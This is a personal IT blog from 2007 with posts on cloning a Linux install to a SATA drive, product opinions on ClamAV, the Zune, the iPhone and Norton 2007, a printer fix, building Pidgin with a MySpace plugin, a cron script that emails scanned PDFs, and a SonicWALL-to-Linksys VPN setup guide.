My /etc/fstab file looked like this:

none /proc proc defaults 0 0
none /sys sysfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
usbfs /proc/bus/usb usbfs devgid=23,devmode=664 0 0
tmpfs /dev/shm tmpfs defaults 0 0
/dev/hda2 swap swap defaults 0 0
/dev/hda1 / ext3 defaults 1 1
/dev/hdc /cdrom iso9660 user,noauto,ro 0 0

All that was necessary was to change the hda drives to sda drives. The final product looked like this:

none /proc proc defaults 0 0
none /sys sysfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
usbfs /proc/bus/usb usbfs devgid=23,devmode=664 0 0
tmpfs /dev/shm tmpfs defaults 0 0
/dev/sda2 swap swap defaults 0 0
/dev/sda1 / ext3 defaults 1 1
/dev/hdc /cdrom iso9660 user,noauto,ro 0 0

Make sure you save your changes, and quit.

4) Next I rebooted. Upon booting up, I went into the BIOS and changed by boot order so that it tried to boot from the SATA drive first. It did! At the Linux boot prompt (grub) I had to stop it from booting, and change the boot options. It was going to boot with "root=/dev/hda1", so I had to change it to "root=/dev/sda1". Having made the change, I booted right up!

5) This was a good chance to make sure that everything worked. All my data looked okay, no errors at booting time, etc. I ran "mount" by itself to ensure that I really was running from my SATA drive at this point ...

ray@frugal:~$ mount
/dev/sda1 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw,devgid=23,devmode=664)
tmpfs on /dev/shm type tmpfs (rw)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/dev/hda1 on /media/disk type ext3 (rw,nosuid,nodev)

6) Having confirmed that this would work from here on out, I needed to make a change to grub so that it boots from the SATA drive from now on (and I wouldn't have to change the root line every time I booted).

vi /boot/grub/menu.lst

In the grub booter file, all I had to change was "hda" to "sda" in the applicable place. In the end, my boot file looked like this:

#
# /boot/grub/menu.lst - configuration file for GRUB
# This file is generated automatically by grubconfig
#

default=0
timeout=5
gfxmenu (hd0,0)/boot/grub/message

title Frugalware 0.6 (Terminus) - 2.6.20-fw4
kernel (hd0,0)/boot/vmlinuz root=/dev/sda1 ro quiet vga=791

title Memtest86+
kernel (hd0,0)/boot/memtest.bin

And that was it!

7) I reboot one more time, this time letting everything run it's course. The BIOS detected the drive ... Frugalware Linux came trying to boot from the correct drive ... and I booted (much quicker than before thanks to the obvious SATA speed advantages).

In closing: This was a "poor mans cloning process". Normally I wouldn't recommend cloning a system that was running. But there weren't any notable side effects. The only issues I found were that my Firefox settings seemed to be lost. The first time I fired it up after this process, I had to re-enter some passwords and such for my various Firefox add-ons. Most likely this was from having those files open and in use when they were copied from one drive to the other.

Was any of this helpful to you? Drop me a line and share your experiences.

Sourcefire Purchases ClamAV

2007-10-05T06:07:00.000-07:00

The Sourcefire Corporation has acquired the open source product ClamAV. ClamAV is a fairly user friendly and very well supported anti virus tool for the open source market. While the product hasn't seen much praise or attention, it serves as a pretty good competitor to commercial products by being an integrable component of an open source firewall and/or Intrusion Detection System. ClamAV often touts that it has fixes to virus's several hours and sometimes days ahead of the higher priced commercial competitors. I myself have built several personal use IPCop firewalls with ClamAV for gateway virus scanning.

Sourcefire hopes to make this open source product marketable and improve it's commercial successes. It also promises to maintain the open source nature of the product. Sourcefire has had successes in this same area with Snort, the Intrusion Detection System.

A full press release is available: here

Microsoft Wants You ... To Use Their MP3 Player

2007-10-03T06:23:00.000-07:00

As if it weren't enough that they have taken over the home PC market and the business desktop ... they also want their software on cellular phones, video games systems, and MP3 players.

I don't know how you feel about this whole business, but the name "Microsoft" means everything but quality in my vocabulary. Their last attempt at an OS was Vista, which anyone will tell you is terrible (insert your digs here). My phone which runs Windows Mobile is practically unusable: mostly due to badly timed "Notifications" and the lack to do simple things like answer an incoming phone call. And their game systems? ... Well those seem to be okay! I love my X-Box original. Of course, I put a mod chip in it several years ago and most of my enjoyment comes from the Xbox Media Center software that I installed to it.

You may remember (or you may not) that Microsoft put out an MP3 player called the Zune a few Christmas's ago. A handful of anti-iPod types all ran out and bought one to get a taste of what was touted as "a new sharing experience". The perk in these devices was the ability to share music with your friends wirelessly. I was impressed with the concept. Advertisements featured pictures of young trendy people all standing around with headphones on - exchanging music with one another. But there is a catch. All of them would have had to have bought one of these devices (and most of your friends have all ready invested in an iPod). There were also some questions about Copyright. So naturally the device only let you "borrow" the music. In a few days time it vanished from your collection.

The device was anything but successful. It sold 1.2 million units (all together). The iPod passed the 100 million mark back in April of this year. Bill Gates was quoted as saying, "For something we pulled together in six months, we are very pleased with the satisfaction we got". Interesting. I wonder if he would say the same thing about the long awaited Windows Vista?

Asked what would be different about these new Zune devices Bill replied, "the satisfaction for the device was superhigh. The satisfaction on the software actually is where we’d expect to see a huge uptick this year. It was just so-so on the software side". So the good part about the device was the hardware, which was actually outsourced and engineered by someone else. The software (the only part that Microsoft actually worked on) was admittedly lackluster.

Microsoft plans to build a sharing community online where users can upload samples of songs, which can be downloaded and replayed on other Zune players. But only three times, then they go away forever. I don't expect users will spend much time hacking or trying to circumvent this protection when the same music is available for illegal download from so many other sources.

My message to Microsoft: Stop spreading out. Show that you care about, and are focusing on the areas in which you are all ready successful. Retool your Operating System so that you are no longer a successful "laughing stock" of the industry. And for God's sakes, leave your OS off of my portable devices. I don't have the patience to troubleshoot all of the problems you are creating and I am tired of having to explain to my user base that annoying features, and crashes are "by design".

Source: New York Times

Apple's OS X on a Dell Notebook

2007-09-21T17:26:00.000-07:00

I remember hearing a long while back that a couple of guys had got OS X to boot up on generic Intel based hardware. It was a lot easier considering Apple ported their operating system over to the Intel platform with the intention of only using it for their specific machines (now with Intel processors). When it happened, it excited a lot of people. But the guys who put it together said "don't get your hopes up ... it barely operates".

Since then, there have been many late nights for a growing pack of nerds that insist on making OS X available for any old Intel based PC. While the process of getting OS X onto your PC may still be rather tricky, it's certainly getting easier. I probably spent 10 hours or more throughout the week going between two different hacked together distributions. I would boot to the DVD okay, get all the way through an installation, and then hit a big brick wall.

My frustrations were echoed by the thousands in the posts of other nerds who were also wasting away hours trying to make this work. "I get the white and gray Apple logo screen ... then it goes black". Me too. "After the install, it just stops at a blinking cursor". I've had that. "I got it installed, but nothing really works". Amen.

By the end of the day I had a fully working installation of OS X Tiger, with sound, and network support. The marriage between a Dell notebook and OS X was a rocky one, but I was surprised at how well it worked. The animations were a bit sluggish but web browsing with Firefox was quite impressive. In my mind I was thinking "this emulates really well!". But alas, there is no emulation here. This is OS X running natively ... on a Dell. How fun. Yet there is something a little weird about seeing such an elegant and well crafted operating system appearing over the "DELL" logo.

The question does remain though, "so you have OS X on your laptop ... now what?". The Intel based OS X has not been around very long, so there is a limited set of applications that work on it. If you were to buy an Apple computer, with the new Intel OS X installed on it, you would have an application called Rosetta. Rosetta makes it possible to run all of your Classic Mac applications by making use of some old Apple CPU tricks. Because you don't have those extra components in an Intel based PC ... you are not likely going to have Rosetta running smoothly (or at all) for some time.

In the mean time though, I can say this. Having OS X at arms reach in the office put a smile on my face. And while my co-workers were unimpressed, I was able to point out a few things like "Expose" and say "Here's that feature that Microsoft stole for Vista ... but didn't implement nearly as well".

Garnter Group Hates the iPhone

2007-08-10T13:27:00.000-07:00

I think of the "Gartner Group" as a bunch of grumpy old men in suits. Like a team of Andy Rooney's running around complaining about how stupid everything is today (without bothering to offer an insightful observation about how to improve things). Part of the reasoning behind my perception of the Gartner Group is based upon a video I was forced to put myself through about "how to become a technical trainer". Thankfully, the Gartner Group gave up the "Certified Technical Trainer" process to CompTIA many years ago. The materials that they produced (a book, and a video) were: extremely outdated, hosted by two of the most entertaining men of all time, and gave genuinely bad advice about training. Not to mention, that their entire course had nothing to do with the IT training industry that we knew then and now. My opinion of these old guys in suits has not changed much.

It was no surprise to me that the Gartner Group hated the new iPhone - even before it was released to the public. Having suffered with one of the worst designed phones (and operating systems, Windows Mobile) of all time, I was looking forward to learning about how the iPhone might work out for a business. I couldn't Google around all of Gartner's lousy claims about why the iPhone is a bad business move. So I am going to address them here in direct response to some comments made by one Ken Dulaney. I should note that Mr. Dulaney claims to have 36 years of experience. For those keeping track, he has been in the IT business since 1971. When did we start calling it the "IT Industry" exactly? I am not counting my years working with Apple IIe's and TRS-80 Color Computers. Maybe I should put that crap on my resume.

He says: Lack of support from major mobile device management suites and mobile security suites
I say: Tell me one good feature that you need, that the iPhone doesn't have? I don't want a "suite" of anything on my phone. I want it to do what a phone should do, and not require a load of software to be added. How security conscious does one need to be with a phone? If you can put a PIN number on it to lock it, you're good. Any more than that and the users will turn on you.

He says: Lack of support from major business mobile e-mail solution providers
I say: What is a "mobile email provider"? The iPhone synchronizes with any POP/SMTP or IMAP provider. Any mail product including Exchange server has that capability. And you can try to shoot me down on IMAP as being "insecure" but it's used an encrypted authentication mechanism for many years (IMAP4).

He says: The operating system platform isn't licensed to alternative hardware suppliers so there are no backup hardware suppliers
I say: That's just what I want. A "cheaper" knock-off iPhone that is manufactured by GPX. Can I order one of those from CDW and have it tomorrow? Get real.

He says: Feature deficiencies, such as no removable battery, could increase the need for support
I say: Yeah, I remember the last time I took the battery out of my phone. Wait, no I don't. Because there is no need to. Guess when I last replaced the battery in my iPod which I have owned for five years? Never.

He says: At this point, it's only available from one U.S. operator
I say: He makes a good point here. But let me tell you something. I live in a tiny town, and I have the worst cell phone coverage possible. I have used both Sprint (Embarq) and Verizon and they both suck. The few folks here who have AT&T coverage say that they never slip beneath two bars, where as I lose signal completely in those same areas. Perhaps Apple wanted to go with a provider that they felt delivered the best service, and not offer phones to providers who would make them look bad. I am going to award that point ... to Apple. Sorry Ken.

He Says: It's an unproven device from a vendor that's never built an enterprise-class phone or mobile device
I say: I have a UTStarcom phone manufactured by Intel, and with an Operating System from Microsoft. It's the worst gadget device I have ever owned to the point that I can hardly take a call on it. I want to track down all the engineers who had a part in making this phone and beat them with it. Which would hurt, because it's so big and heavy. Remember that company called "Apple" who made an MP3 player? And how did that compare with those experts who made the "Rio"? Anyone bought a "Zune" lately? I rest my case.

He says: A high price estimated at $500
I say: Hogwash. My phone was $400, it's only 2 months old, and I couldn't get ten dollars for it. Not to mention, it's all ready "unsupported" by the vendor. Perhaps we could agree that cell phones in general, cost too much.

He says: A clear statement from Apple that it's focused on consumer, not enterprise, business
I say: That was a mistake. Apple didn't expect business customers would come looking for one. They perhaps didn't survey what business customers think about their cell phones. I read a lot of angry comments from people who bought a "gadget phone" and can't make a simple phone call because of lock-ups, lost signals, prematurely dead batteries, etc. I am one of them.

He concludes with: IT "isn't prepared for that right now," Dulaney said. "Apple simply hasn't supplied the tools they need to consider handling this. I think those tools are at least six months out."
I say: Let's do this again in six months. Now stop spamming everyone with your opinions and get back to your old man club. I think they just put in a VHS tape of something starring Walter Matthau.

-Steve Ballantyne

Lexmark Jams on Wrist-band Labels

2007-07-12T10:11:00.000-07:00

In our hospitals Emergency Department and Registration area we have a few Lexmark printers with multiple trays. One of those trays is for printing out a sheet of labels, along with a plastic wrist-band to be worn by the patient. We have had a lot of trouble with the Lexmarks jamming up and eating the wrist-band sheets so I finally took one apart and had a look.

The hospital does a lot of printing. We often have to pull the printers apart and clean the rollers. For the Lexmarks, these are little black wheels with white rubber tires stretched over them. The white is nice, because it allows you to visualize any dirt, dust, or other stuff that has built up on the wheel. Every little bit will detract from it's sticky nature - and bring it that much closer to a paper jam.

While cleaning the rollers in one of the trays, I noticed that one of the wheels falls right onto the "slick stripe" on the wrist-band sheets. If I forced the rollers to try and pick up one of these sheets, it almost fed sideways. It's not rocket science. One wheel pulls a little stronger than the other (which slips) and the paper feeds at an angle, if at all. I decided that since we had a spare tray I could do a little re-engineering.

What I ended up doing was removing the black rod that the wheels attach to and continuing the groove pattern that allowed the wheel to remain stationary on the bar. Continuing the groove pattern all the way to the end of the rod allowed me to push the wheel back on, and keep pushing it all the way over to the end. Now, with the wrist-band label sheets inserted I was just able to clear the "slick spot".

Thinking I was done, I plopped the tray back into the printer and drummed up a wrist-band. Bleep-bleep-bleep! Instant jammage. I would not get off that easy. It turns out that there is a little plastic bar that floats easily up and down on the paper stack. My wrist-band sheet was wrapped around it as it was not clearing my new wheel properly. I am betting that this is the "you are almost out of paper" indicator which I could remove all together and not have any issues. But, I would rather do things right. So out came the tray, and back to the shop I went.

Our maintenance department has a wide assortment of tools. I have asked for some pretty bizarre materials, glues, and tools - which they have always been able to supply. So when I asked for a "heat gun" I figured they would have one somewhere. And they did. In fact, they had two. It would take a bit of searching to find one of them but it did eventually surface. And with that, I went to work on melting this little bar to make it fall left of the wheel. The end result was this ...

At this point, it was 5:00PM and I was not on call. Rather than "test" this tray on someone else's on-call duty - I decided to wait until morning. This morning the tray went in ... and no calls were made. They've been printing on it for several hours without a single jam (knocking on wood). I would consider that a success. And now I have to work on patenting this process or as one of my co-workers suggested, patent an adjustable feeder bar so that no-one would ever have to do something this silly again.

-Steve Ballantyne

MySpace IM on Linux

2007-07-07T07:44:00.001-07:00

MySpace has had an instant messaging functionality for quite a while now. Most of us didn't notice when this happened, as we all have a dozen other instant messaging protocols that we fight about. But recently, my son became a MySpace addict and suggested that I install the MySpace instant messenger so that I can chat with him. Yet, not much to my surprise, there is no MySpace instant messenger for Linux. Bummer.

Thankfully a thoughtful developer has made this possible through a plugin that he has written for use with Pidgin. Pidgin for those of you who haven't kept up, is what used to be known as "GAIM". The name change was made in part due to some lawsuits from the AOL folks. There were some cosemetic icon changes as well which I was not particularly fond of. That is, you used to be able to view all of your buddies with icons to the left of their name which indicated which messenger they were using. The AOL buddy icon represented AIM, the Yahoo "Y!" for the Yahoo IM, and so on. Now, those icons and the option to use them has all been removed. Again, we can thanks the lawyers for that one.

My first step in this process was to track down the Pidgin MySpace code. It was relatively easy to find. You can grab it from here: Then, I went after the main source code for Pidgin. It was found here: http://pidgin.im/pidgin/download/source/ At the time of this writing, Pidgin was at version 2.0.2 (which was one version higher than what the MySpace plugin was written for, 2.0.1).

I started by untarring, and unzippnig the Pidgin source code as "pidgin-2.0.2". Then I cd'd into that directory and ran a ./configure and a make (the usual way). Next, I extracted the "myspace" source code and moved it into /pidgin-2.0.2/libpurple/protocols/. Then, I cd'd into the /pidgin-2.0.2/libpurple/protocols/myspace directory and tried to run "make" as instructed. Boom! Error message.

The error message seemed to stem from these lines in the Makefile for the MySpace plugin ...

Makefile:  $(srcdir)/Makefile.in  $(top_builddir)/config.status
       cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)

Not really understanding what this was trying to accomplish ... I took the easy way out and just commented out the second line with a "#". So my Makefile read like this ...

Makefile:  $(srcdir)/Makefile.in  $(top_builddir)/config.status
#       cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)

Then I ran "make" again, and it was compiled without any errors.

The rest was easy. I went back into /pidgin-2.0.2 and did a "sudo make install" to get the main Pidgin component installed. Then, I went into the /pidgin-2.0.2/libpurple/protocols/myspace directory and did a "make install" again. That's because the other protocols were known by the installer, and installed all ready. But the MySpace plugin was "snuck in" by me.

Now for the fun part. I started up Pidgin and verified that everything was working okay. I set up and configured my AIM, Yahoo, MSN, etc, plugins and made sure that they were working. Then, I added a new MySpace account.

I wasn't sure what I was expected to use for credentials. GUessing that my Screen Name would be my login username and password for MySpace was the correct assumption. There was not much else to configure here. The second tab had some server information and proxy settings. I left all those alone. There was a curious "Use this buddy icon" option at the bottom, which did not yet seem to be functional (or perhaps I broke it). No worries.

Going back to the accounts window I ensured that I was "online" with this plugin. Immediately after activating it, I got a message telling me about a recent friend invite. Handy! It must be working.

Now I needed to add a "buddy". So I went through the usual means in the messenger, which is "Buddies > Add Buddy". I was asked for the buddies screen name ... I wondered what I was expected to use here. MySpace let's you call your profile whatever you want. But I have noticed that they keep track of you by your address: www.myspace.com/somethinghere and they also assign you a number (which most folks don't pay attention to). I went ahead and brought up my son's MySpace page and had a look at these two figures.

For the screen name I tried the number first - and it seemed to work pretty well, although I bet the MySpace URL name would have worked too.

Now, I started up a conversation just to see if this whole thing really works.

We're good! I would expect a few problems with the functionality of this plugin. One, this plugin is really only intended for textual message. The MySpace messenger surely has a slew of odd buttons, smiley collections, animations, etc. None of that is going to work here. And I can't say that I really care. Also, if MySpace is like any of the other messengers - the developers will change up the protocol on a regular basis (with the intent on breaking anyone trying to chat without using their advertising plagued messenger).

Hope this helps someone out there. Enjoy. And message me on MySpace, would ya'? -

Automated Emailing of Files

2007-06-26T13:33:00.000-07:00

It's not often that things slow down enough that I can catch my breath and record what I have worked on. I had plans of maintaining this Blog once I took my new position at the hospital. But by the time I have documented my work order, I am all ready onto something else.

But today I was able to put some time into a pet project. I had a staff member ask me if we could set up a scanner in the emergency room of the hospital, and any time someone scanned a document it would get emailed to a specific doctor. I figured that there was probably a piece of software for Windows that would do it. And I figured right. But I wasn't looking to shell out $129 - $1,000 of our department budget to get the job done. So I turned to my good friend, Open Source.

Here is a shell script I wrote that will look for the existence of a file, and if found - will ship it off to a lucky recipient by email.

Things to take into account:

I created a directory called /mnt/drnobody
I mounted //servername/SHARE to /mnt/drnobody/ with mount -t smbfs -o username=myusernamehere,password=mypasswordhere //servername/SHARE /mnt/drnobody/
I created a README.txt file which is used by my script to check and see that the share is still accessible

And now, the snippet!


#!/bin/bash
# Dr Example Scan Script - Steve Ballantyne 6.26.06

# Check to see if the share is in place

if [ -f /mnt/drnobody/Sharedir/ER/DrNobodyScan/README.txt ]
then
# Share exists - so we check to see if a scanned document is waiting
        if [ -f /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf ]
                then
        # File is waiting so we mail it off
        uuencode /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf /tmp/FAX001.pdf | mail -s "ED Document Scan" doctor.nobody@nowhere.com
        # REMOVE the file so it doesn't get re-faxed
        rm /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf

        else
        # No file is waiting so we stop this task and quit
        echo "Nothing to be sent right now"
        fi
else
        # Uh oh - the share is dead and we panic
        echo "Directory doesn't exist, we need a remount - we will try to do it now"
        mount -t smbfs -o username=myusernamehere,password=mypasswordhere //servername/SHARE /mnt/drnobody/
        /usr/bin/mutt -i panic -s "ED Document Scan FAILED" steve.ballantyne@myemailaddress.com < /dev/null
fi

Now, you may say - "This is crazy! - Who will run this, and how often?". But that is where I slap you with a large bit of logic. I created a cron job (scheduler) that that will run this task every minute, of every hour, of every day. Since this is a scheduled job, we could do without the "echo" stuff too. I just put that there for my own debugging or for when I run this command myself from a terminal. My "crontab" looks like this ...

* * * * * /home/ballantynesd/scriptname.sh > /dev/null

I was able to add it to my crontab with "crontab -e". I had to mark the file executable too, with the usual "chmod 755 scriptname.sh".

Only thing left, is to tell the scanning software to name it's output files as FAX001.pdf, and tell the user's not to scan more than once per minute. ;-) I suppose I could add some support for handling multiple files ... perhaps tomorrorow.

-Steve Ballantyne

Norton 2007 Is a Nightmare

2007-02-10T07:38:00.000-08:00

I have never really been a fan of Norton Antivirus. Long ago the company I was working for bought and ran McAffee antivirus and it seemed to be pretty good stuff. But then we got the Melissa virus. Later, we got the I LOVE YOU virus. Soon after, we got Symantec - and we never had virus problems again.

Now, what exactly is the difference between Norton antivirus, and Symantec Antivirus. In some cases the Symantec corporation wants us to to feel the same about both products. I have the same protection at home as I do at work. I am as safe at home as I am at work. Yet at the same time, you shouldn't feel that the product you are using at work is just some garbage that you can pull off the shelf at Best Buy. Therefore, the products have retained separate identities.

I don't have many complaints about the corporate Symantec Antivirus. But at $65 and up per workstation it should be pretty good. The options are few, the updating and scanning seems simple enough, and the corporate management piece just works. Enter "Norton Antivirus", the home and small business product.

Recently we all had the displeasure of updating our workstations with Norton version 2007. Our 2006 stuff had expired, and with the purchase of new licenses came an all new product. I was hoping for a better interface and I didn't get it. I'm not sure where to begin with my hate for this product. I suppose it starts with the installation process - which went on forever and required several reboots. After a while, you wonder just how many different engines and services you really need to protect you from "the bad stuff of the Internet". Then the updates run, you are back to downloading, installing, and rebooting. The entire process took the better part of 40 minutes which is inexcusable for new (and fast) hardware.

Once installed, I could see that the user interface was not going to be a blessing. It seems that the engineers took anything that might confuse a user and buried it a few layers deep in options. If you ever had an opportunity to disable parts of the engine and leave yourself exposed, those options no longer exist. The result is a horribly simplistic interface which has been built in a fancy yellow framework that is so pathetically sluggish you have to wonder why they didn't just use the .NET parts like everyone else.

I tried to put it aside figuring that I really didn't need to make changes, Norton should protect me just fine and doesn't want my help in the process.

Maybe I was being silly. I should just get to work. Later that day I wanted to show a colleague how "Nessus" works. It's a pretty good open source vulnerability scanner and he needed to run a scan on one of our customers. To demonstrate, I ran a scan on myself. About ten seconds into this scan, Norton began to worry about me. I started seeing pop-overs in the corner of the screen. They said something to the effect of "someone tried to launch an attack against you - but we stopped it". Thanks Norton. I would have turned it off first ... if they gave me that option. But what about Norton actually performs firewall functions? It doesn't appear that Norton has a firewall feature anymore if you are looking at the options and user interface.

The pop-overs continued until all my resources were gone, and Windows gave up. My PC came to a screaming halt. I rebooted. This was not good. Once I booted back up I found that in the "Basic PC Settings" of the user interface was "Inbound Firewall". Oh good. I want to turn that off. Unfortunately, clicking on that option and choosing it ... was not possible. There was a general options link I could click in which there are no Inbound Firewall options.

Day two didn't get any better. I came into work that morning and logged in to find that Norton was harassing me with an ugly critical indicator in the corner. I brought up the window to see what all this fuss is about.

I see. I was being punished for having not performed a full scan of my computer when I had initially installed the product. Excuse me, but I had to get to work after spending an hour installing it. Norton just never seems to understand that you are trying to get work done. Norton likes to update your virus signatures in the middle of a critical task and then pop the alert window over what you were typing. Norton likes to scan your PC for virus's when you sit down in the morning to begin your day, sucking down every last bit of your systems resources.

I was fed up. But perhaps my frustration was unjustified. I'm sure that I can set these options somewhere. I don't want a full virus scan to run every morning when I sit down. Rather, we should run those in the middle of the night when I am at home, tucked away in my bed sleeping. After digging around in the obscure and poorly written interface, I came to the settings I was searching for ...

Here Norton is telling me that it's going to run a full scan every day at 4:00AM, starting today. But here we were 8:00AM that same day ... no scan had ever been performed. Norton, you missed your train. I am a forgiving person, and I will let that go. But we are *not* running a full scan right now. Better luck tommorrow. It continued to harass me. I continued to ignore it.

Next I thought I might change when Norton goes out and gets updates. I hate that I will be in the middle of something important and my hard drive lights up. It's as if a black hole opens in space and sucks in all my power. All I can do is wait. Every time I know it's Norton, who will soon proudly report "Virus definitions were successfully updated". I would love to never see this pop-over again. I want my updates to run at two in the morning. The computer is always on, doing nothing at 2:00AM. I started digging.

Oddly enough, if you want to change the time that Norton does it's updating, you will not find the options in the Norton control center. Where then, are these options? In control panel, under LiveUpdate. Of course! Finally coming to the options I want, I found that my choices were limited to hours or minutes. I have to decide on an amount of time between updates, and cannot pick the specific time of day - any more. Norton, you are about to forever leave my computer.

I started yelling back and forth over the wall to my colleagues. They all agreed that Norton 2007 was the worst peice of garbage that they had ever had the displeasure in running. With that, came the removal process.

Oddly enough, I can't tell you how nicely Norton was removed. Installing the product required an endless number of reboots. Uninstalling it took only one. Although, there was a second reboot shortly after to remove the separate LiveUpdate component. Yes, they leave LiveUpdate on your computer long after Norton is out of the picture. Why? For all of your other installed Symantec products, of course. Of which - I have none.

After uninstalling Norton, I immediately switched to the first free antivirus product I could find. AVG Free by Grisoft. This is a real-time antivirus scanner with scheduled updates (you pick when), mail filtering, shell integration, and nothing else. It was so simple to install and easy to configure ... it was just plain stupid. This product, which costs not a dime, just did what Norton would never allow me to do after hours of screwing around with it. Now, this product is meant for the home user - for home use only. If this works we need to begin purchasing licenses for everyone. But the cost is very low. We could get a five pack of product licences for the whole office for only $165. At $33 a copy it's half or one third what Norton presently costs.

I have been very pleased with the product. It's first day in action, it did exactly what I wanted it to do. It updated itself when I wasn't there. It ran it's full scan overnight. It left me alone and didn't bother me while I was trying to get my work done. It's simply a wonderful product.

Consider me a spokesperson for the product. You can try it to - http://free.grisoft.com. Norton, you will not be missed.

-Steve Ballantyne

Building a Site-to-Site VPN Between SonicWALL and Linksys

2007-01-30T05:53:00.000-08:00

A week or so ago I got a call from a customer who had gone out and purchased a Linksys router "with IPSec VPN" support. He was interested in placing this device at a remote site, and creating a VPN tunnel back to the SonicWALL that we manage. I recommended that he purchase SonicWALL devices for each site (he had more that he wanted to set up), but he was not interested in forking over the thousands of dollars that it would cost him ... and I couldn't blame him.

I have created VPN's between all sorts of odd ball devices, so I didn't think that this one would be any different. Yet this Linksys device would turn out to have quite a few caveats, hence my documentation here.

Some things to know about these new Linksys VPN devices: They used an embedded version of OpenSWAN, they have been known to slack on standards (such as encryption key length), they are not at *all* supported by SonicWALL (probably because of the loose interpretation of standards), you *CANNOT* have spaces in your policy name (it will accept them, but your policy will be broken).

Now, onto the "how to". For this example, I was using a Linksys RVS4000 with Firmware Version: V1.0.11 (out of the box default stuff). The SonicWALL is a Pro 2040 running the latest enhanced firmware, 3.2.0.3e. Note: I did not upgrade the Linksys firmware as I should not be supporting that device at all. Additionally, I am doing all of it's configuration remotely. I would never *dare* update firmware on a device over the Internet (and neither should you).

The Linksys configuration will be a tad more complicated, so we will start with that. Our goal will be to match the settings of the SonicWALL so that the second part goes easier. I have tried all sorts of mis-matched settings, and some of them worked. But if you want this to go smoothly you should stick to what you see here. Go ahead and get logged into your Linksys (if you need help with this part, RTFM).

Once logged in, click VPN from the top, and then VPN Passthrough. We want to *disable* all of these options. This is enabled for people who want to use a remote VPN client from behind this device. We are going to terminate the VPN to this device itself, so we do not want or need any of this enabled. It would only confuse the Linksys. After you disable them, be sure to click the Save Settings button.

Next, also under VPN at the top, click "IPSec VPN". This will bring up a window that you have to scroll through to see all of the options. For tunnel entry it will read "new". We will start with a name. It's HIGHLY important that you NOT use any spaces here. I made this mistake, and it took me an hour or so of troubleshooting cryptic messages to figure it out. Linksys should *not* all you to enter spaces here, but they do.

Keep scrolling and have a look at the other settings here. You can refer to this snapshot that I took.

For this policy that I created, I used "Subnet" for both local and remote. This is usually what you are trying to accomplish. That is, you have two networks (must be different networks) and you want to allow traffic to pass between them. You can also create a "host to network" configuration where one computer accesses a subnet (or vice versa). Obviously, local network should be what is configured on the Linksys device. Remote network, is what the primary subnet is defined as on the SonicWALL side.

For the Remote Security Gateway, choose IP address and put in the static IP of the SonicWALL. If you SonicWALL does not have a static IP, you can pick the "any" option here. But that also means that you would need to later use "agressive mode" and change the "Local Identity" and "Remote Identity" to a "Name" under advanced settings. Hopefully you have a static IP. That makes things easy. :-) Make sure you enter the static IP of the SonicWALL!! Not the SonicWALL's gateway IP (people confuse what they want in this box).

For Key Exchange Method we want to leave it at Auto. Flipping over to manual unlocks a lot of options that I wouldn't want to try and match up to the SonicWALL. For Encryption choose "3DES" (you have no other choice). For Authentication pick "SHA1" as this is what the SonicWALL uses as default. Make sure you disable "PFS" (also default on the SonicWALL). For Pre-Shared key enter a secret word (feel free to use special characters here, it makes the encryption stronger). You will need this password later when you configure the SonicWALL side. Lastly, for Key Life Time enter "28800".

Before you do anything else find the Save Settings button at the bottom which is almost hidden in the colored bar. Save those settings, and then scroll back down to the bottom of the screen and click the "Advanced Settings" button. You will get a pop-up window, so turn off any stupid pop-up blockers that you may be using.

Here is a snapshot that you can follow along with ...

For your Operational Mode, you want to use Main Mode. That is, unless the other end is using a dynamic IP address (in which case you would use Aggressive). For the Local and Remote Identity boxes, leave them at the default settings. This is telling the Linksys that it will trust the SonicWALL's identity based on the IP address that it is connecting from.

For encryption, use "3DES" and change the Authentication to "SHA1". Trust me, life will be easier on you when it comes time to configure the SonicWALL. For the "Group" you want to pick "1024-bit". Most people would call this "DH Group 2" (like the SonicWALL will). Make sure you also change this Key Lifetime to 28800. We do this, because the SonicWALL is not that flexible on these options. Some devices offer a lot of options for keys and might even expire them based on the amount of data being transferred. Again, to make like easier ... just make this 28800 seconds. Lastly, click the "Save Settings" button. Then "Close" this window. You're done here.

For the SonicWALL side, get logged into your SonicWALL and select "VPN" on the left side. Then, click the Add button to get a new policy (otherwise called an "SA") started up. If you have trouble here, RTFM!

We will start with the first tab. Here is a snapshot to follow along with ...

For Authenication Method, stick to the default. For name, pick whatever you want. If you are going to have a lot of these, you might want to pick a name that matches the Linksys at the other end. Or you can put something more meaningful here. SonicWALL will not punish you for using spaces. ;-)

For the IPsec Primary Gateway, enter the public IP address of the Linksys device. If it is using a dynamic IP, you can enter all zeroes here. Bear in mind, you would also have to change to agressive mode (at both ends) and use different "Local/Remote IKE ID" information. For the "Secondary" you can either enter zeroes, or let the SonicWALL do it for you. This field is in case you want to have a "failover" tunnel.

For the Shared Secret, enter the same Pre-Shared key that you used on the Linksys. This is your "secret word". Leave the Local and Peer IKE ID's alone (SonicWALL will know what to do here). Next, click the Network tab and have a look.

For the "Choose local network" you have some options here. If this is the only tunnel you will ever create, you can pick "LAN Primary Subnet". I have found that you can only use that object once in a policy, so I have got in the habit of making a new object that is a bit redundant. Click the drop down and choose "add network". I like to name it something meaningful such as use the network ID in the name, followed by a short description. Then if you have to look at this later, you will see the network ID right here in the policy. Now, make sure you create this is a "LAN" object, type is "Network". Enter the Network ID that this SonicWALL is configured for, and it's subnet mask. After you click "OK" you will be right back at this window.

For remote network, create a new network object that matches the Linksys. Your zone MUST BE "VPN" FOR THIS OBJECT. If it's not, this tunnel will not work!! Now you are ready to click the third tab "Proposals", and have a look.

Now we can be glad that we made all those changes to the Linksys. For Exchange, leave it at "Main Mode" (unless you had to switch to aggressive). For DH Group, leave it at Group 2 (which means, 1024-bit on the Linksys). Use all of the other settings that we did on the Linksys: 3DES, SHA1 and 28800 seconds. For Phase 2, leave the default of ESP, 3DES, and SHA1. Also notice, the default Life Time is 28800 here, and PFS is Disabled! In essence, you should change nothing here, but make sure everything matches up.

